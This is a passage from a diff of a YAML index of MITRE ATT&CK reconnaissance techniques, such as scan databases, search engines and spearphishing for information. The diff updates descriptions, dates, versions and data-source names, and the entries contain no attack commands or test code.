gateway + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: |- - Depending on the specific method of spearphishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) + Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) When it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites. Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts). - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_platforms: - PRE @@ -52439,7 +55541,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Purchase Technical Data description: |- - Before compromising a victim, adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets. + Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets. Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). id: attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f @@ -52447,7 +55549,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:15:26.840Z' + modified: '2021-04-15T03:44:43.900Z' created: '2020-10-02T17:05:43.562Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52472,7 +55574,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Scan Databases description: |- - Before compromising a victim, adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan) + Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan) Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). id: attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f @@ -52480,7 +55582,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:20:18.786Z' + modified: '2021-04-15T03:49:49.260Z' created: '2020-10-02T17:00:44.586Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52506,7 +55608,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Scanning IP Blocks description: |- - Before compromising a victim, adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. + Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120 @@ -52514,11 +55616,10 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:06:09.139Z' + modified: '2021-04-15T03:19:38.469Z' created: '2020-10-02T16:54:23.193Z' x_mitre_data_sources: - - Packet capture - - Network device logs + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: |- Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). @@ -52549,7 +55650,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Search Closed Sources description: |- - Before compromising a victim, adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data) + Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data) Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4 @@ -52557,7 +55658,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:15:53.892Z' + modified: '2021-04-15T03:45:31.020Z' created: '2020-10-02T17:01:42.558Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52587,7 +55688,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Search Engines description: |- - Before compromising a victim, adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking) + Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking) Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968 @@ -52595,7 +55696,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:22:11.245Z' + modified: '2021-04-15T03:52:06.960Z' created: '2020-10-02T16:50:12.809Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52642,7 +55743,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Search Open Technical Databases description: |- - Before compromising a victim, adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan) + Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan) Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0 @@ -52650,7 +55751,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:20:44.166Z' + modified: '2021-04-15T03:50:44.308Z' created: '2020-10-02T16:56:05.810Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52684,7 +55785,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Search Open Websites/Domains description: |- - Before compromising a victim, adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking) + Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking) Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)). id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365 @@ -52692,7 +55793,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:22:46.374Z' + modified: '2021-04-15T03:52:41.104Z' created: '2020-10-02T16:48:04.509Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52705,6 +55806,21 @@ reconnaissance: atomic_tests: [] T1594: technique: + created: '2020-10-02T16:51:50.306Z' + modified: '2021-04-15T03:53:33.023Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + type: attack-pattern + id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26 + description: |- + Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak) + + Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)). + name: Search Victim-Owned Websites + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1594 @@ -52714,23 +55830,10 @@ reconnaissance: description: Bischoff, P. (2020, October 15). Broadvoice database of more than 350 million customer records exposed online. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Search Victim-Owned Websites - description: |- - Before compromising a victim, adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak) - - Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)). - id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: reconnaissance - modified: '2020-10-24T04:23:37.282Z' - created: '2020-10-02T16:51:50.306Z' - x_mitre_data_sources: - - Web logs + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' x_mitre_detection: Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single @@ -52738,10 +55841,8 @@ reconnaissance: Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - PRE + x_mitre_data_sources: + - 'Application Log: Application Log Content' atomic_tests: [] T1593.001: technique: @@ -52758,7 +55859,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Social Media description: |- - Before compromising a victim, adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff. + Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff. Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)). id: attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3 @@ -52766,7 +55867,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:22:46.235Z' + modified: '2021-04-15T03:52:40.958Z' created: '2020-10-02T16:49:31.262Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52792,7 +55893,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Software description: |- - Before compromising a victim, adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.). + Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.). Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884 @@ -52800,7 +55901,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:53:39.162Z' + modified: '2021-04-15T03:23:57.876Z' created: '2020-10-02T16:42:17.482Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52839,7 +55940,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Spearphishing Attachment description: |- - Before compromising a victim, adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. + Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc @@ -52847,20 +55948,21 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:12:48.152Z' + modified: '2021-04-15T03:41:33.335Z' created: '2020-10-02T17:08:57.386Z' x_mitre_contributors: + - Philip Winther - Sebastian Salla, McAfee - Robert Simmons, @MalwareUtkonos x_mitre_data_sources: - - Mail server - - Email gateway + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: 'Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender - is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: - Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)' - x_mitre_version: '1.0' + is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - PRE @@ -52892,7 +55994,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Spearphishing Link description: |- - Before compromising a victim, adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. + Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. id: attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230 @@ -52900,19 +56002,21 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:13:12.752Z' + modified: '2021-04-15T03:42:26.537Z' created: '2020-10-02T17:09:50.723Z' x_mitre_contributors: + - Philip Winther - Sebastian Salla, McAfee - Robert Simmons, @MalwareUtkonos x_mitre_data_sources: - - Mail server - - Email gateway + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: |- - Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) + Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites. - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - PRE @@ -52932,7 +56036,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Spearphishing Service description: |- - Before compromising a victim, adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. + Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. id: attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6 @@ -52940,8 +56044,12 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-25T19:44:58.093Z' + modified: '2021-04-15T03:43:12.843Z' created: '2020-10-02T17:08:07.742Z' + x_mitre_data_sources: + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_contributors: - Robert Simmons, @MalwareUtkonos x_mitre_detection: |- @@ -52970,7 +56078,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Threat Intel Vendors description: |- - Before compromising a victim, adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds) + Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds) Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41 @@ -52978,7 +56086,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:15:53.678Z' + modified: '2021-04-15T03:45:30.862Z' created: '2020-10-02T17:03:45.918Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. @@ -52991,6 +56099,15 @@ reconnaissance: atomic_tests: [] T1595.002: technique: + id: attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4 + description: |- + Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use. + + These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), 